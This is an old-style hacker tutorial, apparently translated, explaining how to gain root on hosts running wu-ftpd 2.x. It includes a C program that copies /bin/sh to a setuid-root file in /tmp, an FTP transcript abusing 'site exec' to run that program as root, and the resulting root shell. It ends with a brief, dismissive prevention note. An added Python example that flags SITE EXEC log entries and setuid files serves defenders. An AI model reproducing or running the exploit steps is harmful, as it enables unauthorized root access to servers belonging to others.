(1) The host's ftpd is wu-ftpd 2.x.
(2) You must have an account (any account) on that host.
2. Steps:
(1) First telnet in and log in to your own directory on the host...
(2) Compile the following program with cc -o bug bug.c ...
--< bug.c >-----------------------------
#include <unistd.h>   /* seteuid() - header names were lost in extraction; restored */
#include <stdlib.h>   /* system()  */

int main(void)
{
    seteuid(0);                      /* ftpd runs as root; take the root effective uid back */
    system("cp /bin/sh /tmp/.sh");   /* copy the shell to /tmp */
    system("chmod 6777 /tmp/.sh");   /* make the copy setuid + setgid */
    return 0;
}
-----------------------------------------
After a successful compile, a file named bug will appear in your directory (don't forget to chmod ...).
(3) Log in to the host with ftp...
220 hackerforce FTP server (Version wu-2.4(1) Sun Jul 31 21:00:15
CDT 1997) ready.
Name (hackerforce:ftp): funky
331 Password required for funky.
Password: (password)
230 User funky logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote "site exec bash -c id" (check whether the system is vulnerable to this bug)
200-bash -c id
200-uid=0(root) gid=0(root) euid=101(funky) egid=50(users)
groups=50(users)
200 (end of 'bash -c id') (once uid=0 appears, it has worked)
ftp> quote "site exec bash -c /your/home/dir/bug" (run the bug program you just compiled)
200-bash -c /your/home/dir/bug
200 (end of 'bash -c /your/home/dir/bug')
ftp> quit (leave ftp)
221 Goodbye.
(4) Telnet back into the host and run /tmp/.sh, the setuid root shell ...
$ id
uid=101(funky) gid=50(user)
$ /tmp/.sh
# id
uid=101(funky) gid=50(user) euid=0(root)
#
Congratulations... at this point you have obtained root privileges....
3. Postscript:
Because wu-ftpd runs with uid root, we use this hole to execute external commands.... Once the compiled bug program is executed, it copies the /bin/sh shell to /tmp/.sh and makes /tmp/.sh setuid; after that, any user who runs the setuid shell /tmp/.sh has an euid of root....
4. Prevention
Why did it work, how do you prevent it, and where is the hole? Why do users have telnet access at all, and why are they able to run the cc compiler! ...... Among the published system bugs there are already fixes and patches for this kind of problem; go and find them yourself!
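Two things a defender can check for the pattern described above: SITE EXEC commands appearing in the FTP daemon's command log, and a setuid/setgid shell left behind in a world-writable directory. The following is an added example and is not part of the original post; it assumes a constructed syslog-style line format for ftpd commands (not wu-ftpd's real log layout) and uses a temporary directory with a constructed setuid file for the filesystem check.

```python
import os
import re
import stat
import tempfile

# Constructed sample lines in a syslog-like style (format assumed, not wu-ftpd's own).
SAMPLE_LOG = """\
Jul 31 21:00:20 hackerforce ftpd[1234]: USER funky
Jul 31 21:00:21 hackerforce ftpd[1234]: PASS ********
Jul 31 21:00:22 hackerforce ftpd[1234]: SITE EXEC bash -c id
Jul 31 21:00:30 hackerforce ftpd[1234]: SITE EXEC bash -c /home/funky/bug
Jul 31 21:00:31 hackerforce ftpd[1234]: QUIT
Jul 31 21:02:00 hackerforce ftpd[1235]: USER alice
Jul 31 21:02:05 hackerforce ftpd[1235]: RETR report.txt
"""

LOG_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ [\d:]+) (?P<host>\S+) ftpd\[(?P<pid>\d+)\]: (?P<cmd>.*)$"
)


def parse_ftp_log(text):
    """Split log text into dicts with ts/host/pid/cmd; unparseable lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries


def find_site_exec(entries):
    """Flag every SITE EXEC, attributing it to the USER seen earlier on the same pid."""
    user_by_pid = {}
    findings = []
    for e in entries:
        cmd = e["cmd"]
        upper = cmd.upper()
        if upper.startswith("USER "):
            user_by_pid[e["pid"]] = cmd[5:].strip()
        elif upper.startswith("SITE EXEC"):
            findings.append({
                "ts": e["ts"],
                "pid": e["pid"],
                "user": user_by_pid.get(e["pid"], "?"),
                "exec": cmd[len("SITE EXEC"):].strip(),
            })
    return findings


def find_setuid_files(root):
    """Return (path, mode, owner uid) for regular files under root with setuid or setgid set."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append((path, oct(stat.S_IMODE(st.st_mode)), st.st_uid))
    return hits


def demo_setuid_scan():
    """Constructed demo: plant a setuid-marked file in a temp dir and scan for it.
    Returns (bit_was_actually_set, detected) so callers can see both outcomes."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, ".sh")
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, 0o4755)  # may be refused or silently dropped on some filesystems
        bit_set = bool(os.stat(path).st_mode & stat.S_ISUID)
        detected = any(hit[0] == path for hit in find_setuid_files(d))
        return bit_set, detected


if __name__ == "__main__":
    for f in find_site_exec(parse_ftp_log(SAMPLE_LOG)):
        print(f"{f['ts']} pid={f['pid']} user={f['user']} SITE EXEC {f['exec']}")
    print("setuid demo (bit set, detected):", demo_setuid_scan())
```

Run it as a script to see the two flagged SITE EXEC lines attributed to funky; in practice, point find_setuid_files at /tmp or other world-writable directories, and treat any SITE EXEC in the command log as a high-priority event on a server of this vintage.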